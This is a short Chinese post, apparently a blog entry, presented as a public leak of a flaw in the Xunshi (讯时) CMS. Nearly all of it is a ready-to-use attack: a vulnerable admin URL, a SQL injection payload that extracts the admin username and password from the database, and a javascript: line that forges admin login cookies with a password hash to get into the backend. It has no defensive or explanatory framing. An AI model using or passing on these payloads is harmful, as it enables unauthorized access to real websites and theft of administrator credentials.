有人公布了,讯时漏洞问题真大 !!!!
/admin/admin_news_pl_view.asp?id=1 //id任意 填入以下语句
有时1显示错误信息的时候继续往后退2,3,4。。。。
|’+dfirst(“[user]“,”[admin]“)+chr(124)+dfirst(“[pass]“,”[admin]“),username=’
cookies进后台
javascript:alert(document.cookie=”adminuser=” + escape(“admin”));alert(document.cookie=”adminpass=” + escape(“480d6d6b4d57cc903f3bab877248da40″));
Posts Tagged ‘讯时’